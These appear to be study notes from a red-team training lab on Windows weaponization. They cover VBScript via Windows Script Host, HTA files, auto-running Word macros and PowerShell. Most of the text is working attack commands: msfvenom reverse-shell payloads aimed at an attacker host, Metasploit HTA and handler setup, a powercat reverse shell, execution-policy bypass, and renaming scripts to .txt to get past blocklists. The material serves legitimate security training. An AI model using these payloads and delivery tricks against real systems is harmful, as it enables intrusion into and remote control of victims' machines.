Weaponization
Weaponizatiion is when red teamers use their own crafted tools to exploit a target
Windows Scripting Host (WSH)
Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system. It uses VBScript
Showing a message box
Windows message box
Dim message message = "Hello" MsgBox message
run it in cmd:
wscript hello.vbs
Use it to run exe files
Run an exe file with VBScript
Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
Execute it with wscript or cscript in cmd:
wscript c:\Users\thm\Desktop\calc.vbs
orcscript.exe c:\Users\thm\Desktop\calc.vbs
In case of blacklist, possible to rename in txt and still run it:
wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
HTML Application (HTA)
Using and `ActiveXObject to execute cmd.exe
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
serve the payload
python3 -m http.server 8000
Visit the page from the target machine
http://IP-ATTACK-MACHINE:8000/payload.hta
and run it
Reverse shell
Create a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta
Launch a listener:
nc -lvp 443
The reverse shell is launched when the link is visited from the target machine
Possible to generate and serve HTA with Metasploit framework
use exploit/windows/misc/hta_server
and we need to set LHOST, LPORT, SRVHOST, Payload we can use this payloadwindows/meterpreter/reverse_tcp
When the link is visited in the target we get a meterpreter shell
Visual Basic for Application (VBA)
We need to use Word
We open Visual Basic Editor by selecting
view → macros
We can give a name to our macro and click create
We then can make another message box
Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
We run the macro with F5
To execute it automatically we can use after the document is open we need to use AutoOpen and Document_open
Sub Document_Open()
MACRONAME
End Sub
Sub AutoOpen()
MACRONAME
End Sub
Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
we save the document in docm or doc
Execute a bin
Sub ExecBin()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
Use msfvenom for VBA
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=443 -f vba
We just need to copy the output in the file
We set the listener with msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
we set also LHOST and LPORTWhen the doc is open in the target machine we get a shell
PowerShell
Write something with powershell we open a text editor and put this inside:
Write-Output "something"
We save the file with .PS1 extension
We can execute it from the cmd:
powershell -File thm.ps1
Execution policy
See if we are restricted:
Get-ExecutionPolicy
Change it:
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
we can also bypassing when executing the script:
powershell -ex bypass -File script.ps1
Getting a reverse shell
We can use powercat
We set up a listener
nc -lvp 443
We launch powercat
powershell -c "powercat -c ATTACKING-MACHINE-IPP -p 443 -e cmd"
We should get a shell
A great tool to generate reverse shell payloads
Resources
Last updated